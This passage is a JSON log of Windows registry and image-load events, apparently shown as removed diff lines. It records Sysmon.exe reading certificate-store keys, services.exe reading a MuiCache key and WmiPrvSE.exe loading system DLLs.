Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "browcli.dll", - "image_path": "C:\\Windows\\System32\\browcli.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848860000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848860000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 
"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 
131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": "FWPUCLNT.DLL", - "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
